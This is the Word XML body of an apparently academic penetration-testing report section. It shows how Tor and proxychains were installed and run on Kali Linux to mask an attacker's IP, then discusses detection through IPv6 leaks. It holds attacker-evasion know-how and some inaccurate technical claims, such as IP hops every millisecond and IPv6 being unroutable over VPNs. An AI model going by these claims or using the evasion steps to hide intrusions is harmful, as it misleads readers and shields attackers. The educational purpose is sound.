      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The ‘Tor’ network that is otherwise known as the dark web</w:t>
      </w:r>
      <w:r w:rsidR="00146031">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00901CBD">
        <w:t xml:space="preserve">is an ad-hoc peer-to-peer network that is hidden from </w:t>
      </w:r>
      <w:r w:rsidR="00146031">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidR="00901CBD">
        <w:t xml:space="preserve"> search engines and ISP’s</w:t>
      </w:r>
      <w:r w:rsidR="00146031">
        <w:t xml:space="preserve"> it was initially created by the US military for covert communications but it was then subsequently released online and has become a place where criminals reside selling stolen credit card information, hacking tools, drugs and other dark criminal activities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B34CB1F" w14:textId="77777777" w:rsidR="00146031" w:rsidRDefault="00146031" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5394C765" w14:textId="25E76DC1" w:rsidR="00FD6C79" w:rsidRDefault="00146031" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Fortunately, an ethical hacker does not have to utilise the ‘Tor’ browser to visit these criminal ‘Onion’ hidden websites to utilise the ‘Tor’ network to hide their location and identity for penetration testing research. Because only the ‘Tor’ client</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">server needs to be utilised to gain access to the many thousands of hidden peer-to-peer ‘Tor’ clients around the world by additionally utilising another tool called proxy chaining. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E014077" w14:textId="77777777" w:rsidR="00FD6C79" w:rsidRDefault="00FD6C79" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042F768C" w14:textId="4AAAF7F0" w:rsidR="003642DC" w:rsidRDefault="00146031" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Proxy chaining allows an attacker to configure the tool so that their IP address and connection will run through the ‘Tor’ clients that are situated around the globe utilising each of their IP address each time it jumps or proxy chains from one ‘Tor’ client to the next which happens in less than 1ms, which is nearly impossible to detect by security services because of the architecture of the ‘Tor’ network that is hidden from ISP</w:t>
      </w:r>
      <w:r w:rsidR="00FD6C79">
        <w:t>’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00FD6C79">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the efficient nature of the proxy chaining tool </w:t>
      </w:r>
      <w:r w:rsidR="00FD6C79">
        <w:t>itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF67C08" w14:textId="5A0105CA" w:rsidR="00FD6C79" w:rsidRDefault="00FD6C79" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DAADC8" w14:textId="7B87A3E9" w:rsidR="00FD6C79" w:rsidRPr="003642DC" w:rsidRDefault="00FD6C79" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To start the demonstration ‘Tor’ was installed using </w:t>
      </w:r>
      <w:r w:rsidR="004038D8">
        <w:t>the Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux CLI syntax; [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> apt-get install tor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] which was automatically installed on the </w:t>
      </w:r>
      <w:r w:rsidR="00942E65">
        <w:t>attackers’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> machine. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was also installed from the Kali Linux CLI by executing the syntax; [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which was also automatically installed on the attacker’s machine using this syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC20A97" w14:textId="2BC90AB1" w:rsidR="003642DC" w:rsidRDefault="003642DC" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AAC04E9" w14:textId="0C1BBD66" w:rsidR="00FD6C79" w:rsidRDefault="00FD6C79" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To start the attack the ‘Tor’ service had to be started by issuing the Kali Linux CLI synt</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>x [</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD6C79">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
      <w:r>
        <w:t>], to check the ‘Tor’ overlay TCP netw</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t>k had been started the syntax from the Kali Linux CLI was also executed; [service tor statu</w:t>
      </w:r>
      <w:r w:rsidR="00437C65">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]. The output from this command can be found in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>figure ??.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F982BFD" w14:textId="0BDC7E7A" w:rsidR="004038D8" w:rsidRDefault="004038D8" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE47EFF" w14:textId="77777777" w:rsidR="00123A6D" w:rsidRDefault="00437C65" w:rsidP="00123A6D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081F94BF" wp14:editId="3E9A07F4">
            <wp:extent cx="3204210" cy="1062990"/>
            <wp:effectExtent l="0" t="0" r="0" b="38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204210" cy="1062990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D3E410" w14:textId="1C69CA83" w:rsidR="00FD6C79" w:rsidRDefault="00123A6D" w:rsidP="00123A6D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Checking Tor Service Is Running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B6C8D" w14:textId="77777777" w:rsidR="00437C65" w:rsidRDefault="00437C65" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7151E6A7" w14:textId="5A856938" w:rsidR="00FD6C79" w:rsidRDefault="00FD6C79" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next </w:t>
      </w:r>
      <w:r w:rsidR="00AD475E">
        <w:t xml:space="preserve">step within the attack </w:t>
      </w:r>
      <w:r w:rsidR="004038D8">
        <w:t xml:space="preserve">was to configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004038D8">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004038D8">
        <w:t xml:space="preserve"> to route through the ‘Tor’ network this was achieved by editing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004038D8">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004038D8">
        <w:t xml:space="preserve"> configuration file located within the /etc/ folder within Kali Linux called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004038D8">
        <w:t>proxychains.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004038D8">
        <w:t xml:space="preserve"> with a Linux text editor called ‘Nano’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C79B2" w14:textId="77777777" w:rsidR="00437C65" w:rsidRDefault="00437C65" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CDA779F" w14:textId="6C8B35D9" w:rsidR="004038D8" w:rsidRDefault="004038D8" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next step in the test was to identify the public IP address the LAN the </w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t>attacker’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> machine was connected to by doing a google search’ ‘What’s my IPv4 Address?’ this gave the output of the genuine public IP address of the attacker. This step was taken as a controlled measure to test the ‘Tor’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxychaining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method </w:t>
      </w:r>
      <w:r w:rsidR="00F40AA9">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identify if it is correctly </w:t>
      </w:r>
      <w:r w:rsidR="00F40AA9">
        <w:t>and continuously changing the identity of the attackers IP address.</w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t xml:space="preserve"> The output from this test can be found in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00627477">
        <w:t>figure ??.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="339DBE51" w14:textId="459B0643" w:rsidR="00627477" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601A35D9" w14:textId="77777777" w:rsidR="00123A6D" w:rsidRDefault="00437C65" w:rsidP="00123A6D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="170596F8" wp14:editId="68F0BA0E">
            <wp:extent cx="3204210" cy="2013585"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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204210" cy="2013585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72C228" w14:textId="6352EC82" w:rsidR="00437C65" w:rsidRDefault="00123A6D" w:rsidP="00123A6D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Checking Genuine IP Address Using Google Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6045903F" w14:textId="77777777" w:rsidR="00437C65" w:rsidRDefault="00437C65" w:rsidP="00627477"/>
    <w:p w14:paraId="63DD69BC" w14:textId="4F632883" w:rsidR="004038D8" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next step taken was to initialise the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxychaining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> through the ‘Tor’ network by issuing the command from the Kali Linux CLI; </w:t>
      </w:r>
      <w:r w:rsidRPr="00627477">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00627477">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00627477">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00627477">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00627477">
        <w:t xml:space="preserve">This command launched the browser </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00627477">
        <w:t xml:space="preserve">irefox and the terminal reported the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00627477">
        <w:t>proxychaining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00627477">
        <w:t xml:space="preserve"> of IP addresses every 1ms through the tor network as expected. The output from this step can be found in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00123A6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>figure 21</w:t>
      </w:r>
      <w:r w:rsidRPr="00123A6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB4307" w14:textId="02773FB5" w:rsidR="00627477" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB33397" w14:textId="77777777" w:rsidR="00123A6D" w:rsidRDefault="00437C65" w:rsidP="00123A6D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26F3F3FD" wp14:editId="3279156D">
            <wp:extent cx="3200400" cy="146939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200400" cy="1469390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2240826D" w14:textId="231BB2A1" w:rsidR="00437C65" w:rsidRDefault="00123A6D" w:rsidP="00123A6D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Proxy Chains Initialised Using Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F146483" w14:textId="77C81DD0" w:rsidR="00627477" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00627477">
        <w:t xml:space="preserve">The final test was to search google once again to identify the public IP address that was being reported to observe if the attack was working as it should. The output from this test can be found in </w:t>
      </w:r>
      <w:r w:rsidRPr="00123A6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00123A6D" w:rsidRPr="00123A6D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00627477">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0BA82" w14:textId="77198ED4" w:rsidR="00627477" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A893FA5" w14:textId="532CB7D6" w:rsidR="00437C65" w:rsidRDefault="00437C65" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45982BF3" w14:textId="77777777" w:rsidR="00437C65" w:rsidRDefault="00437C65" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C34BBD2" w14:textId="77777777" w:rsidR="00627477" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41383883" w14:textId="3CECD016" w:rsidR="00437C65" w:rsidRDefault="00437C65" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="089A0574" wp14:editId="66CC2045">
            <wp:extent cx="3204210" cy="181038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204210" cy="1810385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF4A2A" w14:textId="77777777" w:rsidR="004972EB" w:rsidRDefault="00437C65" w:rsidP="004972EB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299D5A0B" wp14:editId="239D26F5">
            <wp:extent cx="3204210" cy="51879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204210" cy="518795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B16444" w14:textId="6240CEC5" w:rsidR="00437C65" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Tor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proxychained</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Fake Public IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBBA349" w14:textId="7628136C" w:rsidR="00123A6D" w:rsidRDefault="00123A6D" w:rsidP="00123A6D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The IP address that was reported was first</w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004972EB" w:rsidRPr="004972EB">
        <w:t>94.5.161.141</w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that was located in </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t xml:space="preserve">Wales, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004972EB">
        <w:t xml:space="preserve">UK </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then after the page was refreshed the IP address reported was </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>185.220.101.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> located </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t xml:space="preserve">Germany. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37720878" w14:textId="77777777" w:rsidR="00123A6D" w:rsidRDefault="00123A6D" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3768AC66" w14:textId="525F3BA3" w:rsidR="00627477" w:rsidRPr="00627477" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The evasion technique was a success which proves how difficult it is to identify and locate malicious actors within the cybercrime world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D95532" w14:textId="77777777" w:rsidR="00627477" w:rsidRDefault="00627477" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DDC94D" w14:textId="77777777" w:rsidR="000A0AC1" w:rsidRDefault="00897215" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Detecti</w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t xml:space="preserve">ng a cybercriminal </w:t>
      </w:r>
      <w:r w:rsidR="00F05649">
        <w:t>that is utilising this evasion</w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t xml:space="preserve"> technique is very difficult because of the speed in which the </w:t>
      </w:r>
      <w:r w:rsidR="00F05649">
        <w:t xml:space="preserve">proxy </w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t>connection jumps around the world</w:t>
      </w:r>
      <w:r w:rsidR="00F05649">
        <w:t xml:space="preserve"> changing the attackers IP address</w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t xml:space="preserve"> through the ‘Tor’ network. The </w:t>
      </w:r>
      <w:r w:rsidR="00CE5AE7">
        <w:t>identity</w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t xml:space="preserve"> of an attacker using this method </w:t>
      </w:r>
      <w:r w:rsidR="000105DB">
        <w:t>could</w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t xml:space="preserve"> only be obtained if they were </w:t>
      </w:r>
      <w:r w:rsidR="00CE5AE7">
        <w:t>amateurs</w:t>
      </w:r>
      <w:r w:rsidR="00627477">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00CE5AE7">
        <w:t>the IPv6 protocol</w:t>
      </w:r>
      <w:r w:rsidR="00F05649">
        <w:t xml:space="preserve"> within their device was</w:t>
      </w:r>
      <w:r w:rsidR="00CE5AE7">
        <w:t xml:space="preserve"> enabled</w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0ED95" w14:textId="77777777" w:rsidR="000A0AC1" w:rsidRDefault="000A0AC1" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E540494" w14:textId="77777777" w:rsidR="000A0AC1" w:rsidRDefault="000A0AC1" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6</w:t>
      </w:r>
      <w:r w:rsidR="00CE5AE7">
        <w:t xml:space="preserve"> cannot be routed through VPN’s or the ‘Tor’ network so each packet would still contain the attackers originating IPv6 address </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">even though their IPv4 address would change at each hop of the ‘Tor’ proxy network </w:t>
      </w:r>
      <w:r w:rsidR="00CE5AE7">
        <w:t>revealing their true location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D76939C" w14:textId="77777777" w:rsidR="000A0AC1" w:rsidRDefault="000A0AC1" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEDF799" w14:textId="0DE24C1D" w:rsidR="000105DB" w:rsidRPr="000105DB" w:rsidRDefault="00CE5AE7" w:rsidP="000105DB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>However</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> most professional hackers </w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t>have this knowledge</w:t>
      </w:r>
      <w:r>
